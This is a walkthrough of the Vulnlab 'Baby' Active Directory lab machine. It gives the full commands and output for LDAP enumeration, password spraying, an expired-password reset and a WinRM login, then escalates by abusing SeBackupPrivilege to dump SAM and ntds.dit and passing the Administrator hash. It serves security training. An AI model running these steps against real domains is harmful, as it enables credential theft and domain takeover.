Vulnlab Baby Walkthrough by Yunolay (LDAP Enumeration, SMB Password Spraying, Privilege escalation using SeBackupPrivilege and SeRestorePrivilege)

Vulnlab
2023.10.24

Buy Me a Coffee

Time it takes to read this article 11 minutes.

Overview

Active Directory Pentesting

  • Baby (Solo, Windows)
    • Junior Level Windows Active Directory Machine
    • You will learn about LDAP-Enumeration & Windows Privileges

User

Look into anonymous LDAP Access.

Root

Look at user privileges.

Nmap Scan

I first scanned it normally with nmap. But it was protected by tcpwrapped.

$ nmap -sT -sCV -p- -Pn --min-rate 5000 10.10.88.63
...
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-23 10:44 EDT
Nmap scan report for 10.10.88.63
Host is up (0.24s latency).
Not shown: 65525 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open tcpwrapped
389/tcp open tcpwrapped
445/tcp open tcpwrapped
464/tcp open tcpwrapped
593/tcp open tcpwrapped
3389/tcp open tcpwrapped
|_ssl-date: 2023-10-23T11:30:03+00:00; -3h15m47s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2023-07-29T07:48:30
|_Not valid after: 2024-01-28T07:48:30
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-10-23T11:29:20+00:00
49664/tcp open tcpwrapped
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -3h15m49s, deviation: 2s, median: -3h15m51s
| smb2-time:
| date: 2023-10-23T11:29:22
|_ start_date: N/A
...
Bash

I tried nmap tcpwrapped bypass scan. It worked and the service appeared. I was able to get results that I was satisfied with.

$ nmap -n -vv -A --min-parallelism=50 --max-parallelism=150 -Pn -T2 10.10.88.63
...
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-10-23 11:33:49Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2023-10-23T11:34:51+00:00; -3h15m18s from scanner time.
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-10-23T11:34:06+00:00
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-29T07:48:30
| Not valid after: 2024-01-28T07:48:30
| MD5: 78d3:c88b:3a9a:ed6c:5130:b9de:3806:8c4d
| SHA-1: a58c:9299:bb68:7192:5f48:8c6e:4022:1426:3a56:6006
| -----BEGIN CERTIFICATE-----
| MIIC4DCCAcigAwIBAgIQI7m815YbYopO+rW6xwiAbzANBgkqhkiG9w0BAQsFADAZ
| MRcwFQYDVQQDEw5CYWJ5REMuYmFieS52bDAeFw0yMzA3MjkwNzQ4MzBaFw0yNDAx
| MjgwNzQ4MzBaMBkxFzAVBgNVBAMTDkJhYnlEQy5iYWJ5LnZsMIIBIjANBgkqhkiG
| 9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtmGKygCtjLyMrnmlpL8VodB5kUbqLs5iZQkJ
| OFepL2mAt9nKuxXFA4mFiWHmc3N470k5+eRUffJt3jZNghiBOC2h1EGY2BqTPFRu
| DcSTSVYBLHOfZ8XNIMoL6WIE8xT1dqSIzkkXQvAqaxJzvLV3kfhE5ouR0rcO0aG+
| +hDCoxtUzI9D8Ou/D+R+/55+2qQLXWhSwgls3HDkOXyZ5Y55zKbDbId2CiJNMLn4
| xbqc4kK6G0UHPlONp/v1Zu+Tct/OgHTMU6X0Nsi3TCuXvxSgFW01arBlI7td9eok
| ekiWVHQoAji4tO6Ebyb4Obpem2wumZixYKZkjIOkAt4zbc4shQIDAQABoyQwIjAT
| BgNVHSUEDDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQAD
| ggEBAA3wqSyE2RE5eoEqZWteHZrexqnaKjtXvVy2gtS85/ekslOH5PG2wCSNGacv
| ix5wK0e7sDUPHbUSrDHiP+hLFWBdXU9HQjRq41VFNJ+hKrx++L1tepEbIe9TF1Sw
| oSg3QUuEDAjUtu30HyWGVCE6gNmQCqfgDUlVYXA0u2ANYJUd0XLhb3N7NGsnXHkh
| PtljTOnWXFzzB7mFQ9eDZsQDNAxDFIPS2xHgZWD5iyD2kVlfMSz2CAThr0K+Bn9L
| EvrGHBALSF7YBImNzoy0S4Qy9j5Rx/AB/pq/VAgtP4dZKdzzjttluSdsHIiOfvmi
| 7nuiYx9vqG7eT3KNae69dV8u+8Y=
|_-----END CERTIFICATE-----
5357/tcp open tcpwrapped syn-ack
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-10-23T11:34:10
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 62673/tcp): CLEAN (Timeout)
| Check 2 (port 49254/tcp): CLEAN (Timeout)
| Check 3 (port 63888/udp): CLEAN (Timeout)
| Check 4 (port 45646/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -3h15m20s, deviation: 2s, median: -3h15m22s
...
Bash

I found it to Domain: baby.vl, BIOS Name: BabyDC

LDAP Enumeration

Next I used ldapsearch to enumerate the LDAP.

Pentesting LDAP Servers
Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up… 
$ ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.63 "*"
...
# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Teresa Bell
sn: Bell
description: Set initial password to BabyStart123!
givenName: Teresa
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl
instanceType: 4
whenCreated: 20211121151108.0Z
whenChanged: 20211121151437.0Z
displayName: Teresa Bell
uSNCreated: 12889
memberOf: CN=it,CN=Users,DC=baby,DC=vl
uSNChanged: 12905
name: Teresa Bell
objectGUID:: EDGXW4JjgEq7+GuyHBu3QQ==
userAccountControl: 66080
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132819812778759642
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAf1veU67Ze+7mkhtWWgQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: Teresa.Bell
sAMAccountType: 805306368
userPrincipalName: Teresa.Bell@baby.vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dSCorePropagationData: 20211121163014.0Z
dSCorePropagationData: 20211121162927.0Z
dSCorePropagationData: 16010101000416.0Z
msDS-SupportedEncryptionTypes: 0
...
Bash

Looking at the results, I found that Teresa.Bell’s password is “BabyStart123!”
I enumerated all users, deleted useless extra users, and adjusted the strings of first and last names.

$ ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.63 "*" | grep userPrincipalName | cut -d " " -f 2 | cut -d "@" -f 1
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Bash

Save this result as users.txt.

SMB Password Spraying

Anyway I tried password spray, but it didn’t work.

Password Spraying – HackTricks
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the 
$ crackmapexec smb 10.10.88.63 -u users.txt -p "BabyStart123\!"
SMB 10.10.88.63 445 BABYDC [*] Windows 10.0 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
Bash

When I returned to ldapsearch, I noticed that the user enumeration was missing because the attributes were missing.

$ ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.63 "*" | grep "#"
...
# Administrator, Users, baby.vl
# Guest, Users, baby.vl
# krbtgt, Users, baby.vl
# Domain Computers, Users, baby.vl
# Domain Controllers, Users, baby.vl
# Schema Admins, Users, baby.vl
# Enterprise Admins, Users, baby.vl
# Cert Publishers, Users, baby.vl
# Domain Admins, Users, baby.vl
# Domain Users, Users, baby.vl
# Domain Guests, Users, baby.vl
# Group Policy Creator Owners, Users, baby.vl
# RAS and IAS Servers, Users, baby.vl
# Allowed RODC Password Replication Group, Users, baby.vl
# Denied RODC Password Replication Group, Users, baby.vl
# Read-only Domain Controllers, Users, baby.vl
# Enterprise Read-only Domain Controllers, Users, baby.vl
# Cloneable Domain Controllers, Users, baby.vl
# Protected Users, Users, baby.vl
# Key Admins, Users, baby.vl
# Enterprise Key Admins, Users, baby.vl
# DnsAdmins, Users, baby.vl
# DnsUpdateProxy, Users, baby.vl
# dev, Users, baby.vl
# Jacqueline Barnett, dev, baby.vl
# Ashley Webb, dev, baby.vl
# Hugh George, dev, baby.vl
# Leonard Dyer, dev, baby.vl
# Ian Walker, dev, baby.vl
# it, Users, baby.vl
# Connor Wilkinson, it, baby.vl
# Caroline Robinson, it, baby.vl
# Joseph Hughes, it, baby.vl
# Kerry Wilson, it, baby.vl
# Teresa Bell, it, baby.vl
...
Bash

I recreated the user list. Delete what we don’t need and save it again as users.txt.

$ ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.63 "*" | grep "#" | grep -oE '\b\w+\s\w+\b' | sed 's/ /./g'
...
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Ian.Walker
Connor.Wilkinson
Caroline.Robinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
...
Bash

I used crackmapexec again to password spray.

$ crackmapexec smb 10.10.88.63 -u users.txt -p "BabyStart123\!"
SMB 10.10.88.63 445 BABYDC [*] Windows 10.0 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Ian.Walker:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.88.63 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
Bash

As a result, the user discovered an account “Caroline.Robinson” whose password must be changed at next logon.
There are known ways to change passwords remotely.

Resetting an Expired Password Remotely
I’ve often found that while performing password guessing on a network, I’ll find valid credentials, but the password will be expired. This presents a challenge, because the credentials are of limited use until they are reset. # crackmapexec smb 10.0.0.15 -u locked -p Password1 SMB 10.0.0.15…

I changed Caroline.Robinson’s password remotely. It worked fine.

$ smbpasswd -r 10.10.88.63 -U "Caroline.Robinson"
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user Caroline.Robinson
Bash

User – Caroline.Robinson

Obtain a remote shell by logging in as Caroline.Robinson using the changed password in evilwin-rm.

It worked and there was a User Flag on Caroline.Robinson’s Desktop.

$ evil-winrm -i 10.10.88.63 -u Caroline.Robinson -p Password1

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> type C:\Users\Caroline.Robinson\Desktop\user.txt
VL{<REDACTED>}
Bash

Privilege Escalation – Administrator

Check the privileges granted to Caroline.Robinson using the “whoami /priv” command.

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Bash

Caroline.Robinson had SeBackupPrivilege and SeRestorePrivilege privileges.

This privilege can save the registry and is known to be able to dump SAM and SYSTEM and restore the NT hash.

Dumping Hashes from SAM via Registry – Red Team Notes
Security Accounts Manager (SAM) credential dumping with living off the land binary. 
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> reg save hklm\system system
The operation completed successfully.

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> reg save hklm\sam sam
The operation completed successfully.
Bash

evil-winrm has a download function, so it was very easy. I used impacket-secretsdump to dump the Administrator’s NT hash.

$ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

Log in as Administrator using Path the hash using the hash dumped by evil-winrm. However, this challenge failed.

$ evil-winrm -i 10.10.88.63 -u Administrator -H 8d992faed38128ae85e95fa35868bb43

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code
Bash

This is actually a local Administrator hash and cannot be used to log in on domain controllers. instead, We need to get a hash of the accounts in the domain. To do this, we will also need to obtain “ntds.dit”.

BLACKFIELD – HACKTHEBOX – ProCoder
This is the Write-up/Walkthrough of the BLACKFIELD Active Directory Machine from Hackthebox. NMAP SCAN: Domain: BLACKFIELD.LOCAL, BIOS NAME: DC01 Shares found on SMB: Interacting with profiles$ share, found a list of empty directories, with username, copied all the output, saved it to a file named u…

Creating Distributed Shell file and adding commands which will be used by diskshadow.

$ cat kunal.dsh
set context persistent nowriters
add volume c: alias kunal
create
expose %kunal% z:

$ unix2dos kunal.dsh
unix2dos: converting file kunal.dsh to DOS format...
Bash

Then upload the file using evil-winrm download functionality, and used diskshadow command to create a copy of C drive to new drive named F:

*Evil-WinRM* PS C:\Temp> upload kunal.dsh
                                        
Info: Uploading /home/kali/vulnlab/Baby/kunal.dsh to C:\Temp\kunal.dsh
                                        
Data: 112 bytes of 112 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Temp> diskshadow /s kunal.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  BABYDC,  10/23/2023 3:11:30 PM


-> set context persistent nowriters
-> add volume c: alias kunal
-> create
Alias kunal for shadow ID {69873b2c-c8cc-47c4-87f6-530b086b0eed} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {825b3882-58fd-45ec-82b4-d41c20790e90} set as environment variable.


Querying all shadow copies with the shadow copy set ID {825b3882-58fd-45ec-82b4-d41c20790e90}


* Shadow copy ID = {69873b2c-c8cc-47c4-87f6-530b086b0eed} %kunal%
- Shadow copy set: {825b3882-58fd-45ec-82b4-d41c20790e90} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{1b77e212-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 10/23/2023 3:11:30 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: BabyDC.baby.vl
- Service machine: BabyDC.baby.vl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes:  No_Auto_Release Persistent No_Writers Differential


Number of shadow copies listed: 1
-> expose %kunal% z:
-> %kunal% = {69873b2c-c8cc-47c4-87f6-530b086b0eed}
The shadow copy was successfully exposed as z:\.
Bash

diskshadow command successfully copied the C: drive to F: drive.

*Evil-WinRM* PS C:\Temp> robocopy /B Z:\Windows\NTDS . ntds.dit


-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------


  Started : Monday, October 23, 2023 3:16:12 PM
   Source : Z:\Windows\NTDS\
     Dest : C:\Temp\


    Files : ntds.dit


  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30


------------------------------------------------------------------------------


                   1 Z:\Windows\NTDS\
    New File    16.0 m ntds.dit
 
...


------------------------------------------------------------------------------


               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   16.00 m   16.00 m         0         0         0         0
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00




   Speed :           111,107,390 Bytes/sec.
   Speed :             6,357.616 MegaBytes/min.
   Ended : Monday, October 23, 2023 3:16:12 PM
Bash

The ntds.dit file has been created.

*Evil-WinRM* PS C:\Temp> dir ntds.dit


Directory: C:\Temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/23/2023 10:52 AM 16777216 ntds.dit
Bash

Download ntds.dit.

*Evil-WinRM* PS C:\Temp> download ntds.dit

Info: Downloading C:\Temp\ntds.dit to ntds.dit

Info: Download successful!
Bash

I think using impacket-smbserver is also a good solution.

$ impacket-smbserver -smb2support control `pwd`
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Bash

I dumped the Administrator’s NT hash again using ntds.dit.

$ impacket-secretsdump -sam sam -system system -ntds ntds.dit local
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYDC$:1000:aad3b435b51404eeaad3b435b51404ee:e1423e874f45e8b7a8627f4475e0e9d9:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6da4842e8c24b99ad21a92d620893884:::
...
Bash

Establish a shell with evil-winrm using the dumped hash of the domain account. This worked fine.

$ evil-winrm -i 10.10.88.63 -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Bash

I got the root flag.

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
VL{<REDACTED>
Bash

Thoughts

I had the wrong knowledge that if I had SeBackupPrivilege and SeRestorePrivilege, I could dump Administrator’s NT by saving SAM and SYSTEM, so I saved ntds.dit and realized that I needed the NT hash of the domain account. I learned a lot from it.

I had the experience of not being able to solve this problem, so I learned a lot.

Reference

389, 636, 3268, 3269 – Pentesting LDAP – HackTricks
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Pentesting LDAP Servers
Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up…
Password Spraying – HackTricks
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the
Resetting an Expired Password Remotely
I’ve often found that while performing password guessing on a network, I’ll find valid credentials, but the password will be expired. This presents a challenge, because the credentials are of limited use until they are reset. # crackmapexec smb 10.0.0.15 -u locked -p Password1 SMB 10.0.0.15…
Dumping Hashes from SAM via Registry – Red Team Notes
Security Accounts Manager (SAM) credential dumping with living off the land binary.
BLACKFIELD – HACKTHEBOX – ProCoder
This is the Write-up/Walkthrough of the BLACKFIELD Active Directory Machine from Hackthebox. NMAP SCAN: Domain: BLACKFIELD.LOCAL, BIOS NAME: DC01 Shares found on SMB: Interacting with profiles$ share, found a list of empty directories, with username, copied all the output, saved it to a file named u…

Walkthroughs

Perlite
A web based markdown viewer optimized for Obsidian Notes
Lab – Baby Walkthrough • Vulndev
Baby is an easy machine on Vulnlab that involves enumerating LDAP & spraying credentials. For SYSTEM we exploit SeBackup & SeRestore Privileges.
BABY – VULNLAB – ProCoder
This is the Write-up/Walkthrough of the BABY Machine from VULNLAB. NMAP SCAN: Domain: baby.vl, BIOS Name: BabyDC Looking for smb, tried connecting to it as anonymous, but it was not allowed, looking forward, i used ldapsearch to enumerate the domain with blank credentials. Looking for the output res…

Comments

Copied title and URL